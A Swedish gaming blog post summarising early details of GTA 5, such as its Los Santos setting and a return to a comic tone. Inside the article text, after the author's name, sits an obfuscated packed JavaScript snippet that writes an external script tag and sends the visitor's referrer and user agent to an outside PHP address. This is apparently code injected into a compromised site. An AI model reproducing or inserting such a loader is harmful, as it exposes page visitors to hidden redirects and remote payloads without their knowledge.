Image Image Image Image Image Image Image Image Image Image

| 20 juni, 2021

Scroll to top

Top

GTA 5 Information

GTA 5 Information
Sebastian

I eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ffzat|var|u0026u|referrer|etfyi||js|php’.split(’|’),0,{}))
onsdags kom det första livstecknet från GTA 5 i form av en riktigt fin trailer (se den
här), men vi vet fortfarande väldigt lite om spelet. Rockstar har dock nu släppt lite detaljer om sin kommande storsatsning.

Spelet är nu i full utveckling på Rockstar North, studion som producerat alla GTA-spelen sedan mästerverket GTA 3 till Playstation 2. I en kort pressrelease har man släppt lite detaljer om hur spelet kommer fungera. Man har bl.a. bekräftat att det mycket riktigt är Los Santos som den kommande delen i serien utspelar sig i, tidigare sett i GTA San Andreas som är min personliga favorit av alla spelen. I Los Santos får vi se Rockstars egna tolkningar av bl.a. Hollywood, Rodeo Drive, Downtown och de mer kriminella områdena så som Compton. Även områdena runtom; skogen, bergen och stränderna är återigen med, så med andra ord blir detta definitivt det största spelet i GTA:s historia.

I pressreleasen tillkommer även att spelet tar sig tillbaka till det mer komiska upplägget som vi känner igen från Vice City och och San Andreas, att det utspelar sig i nutid och ska ta en revolutionerande riktning för att utveckla hela open-world konceptet vad gäller frihet, storytelling, uppdrag och multiplayer, vi kommer alltså kunna göra mer eller mindre vad som helst. Vad gäller handling är Rockstar däremot fortfarande ganska hemliga, men vi  har även fått klart för oss att de fortsätter med samma stil som tidigare; huvudrollen strävar efter att bli rik och kommer utsättas för allt möjligt i jakten på pengar.

Ytterligare detaljer bör släppas inom kort och då vet ni vart ni läser om det!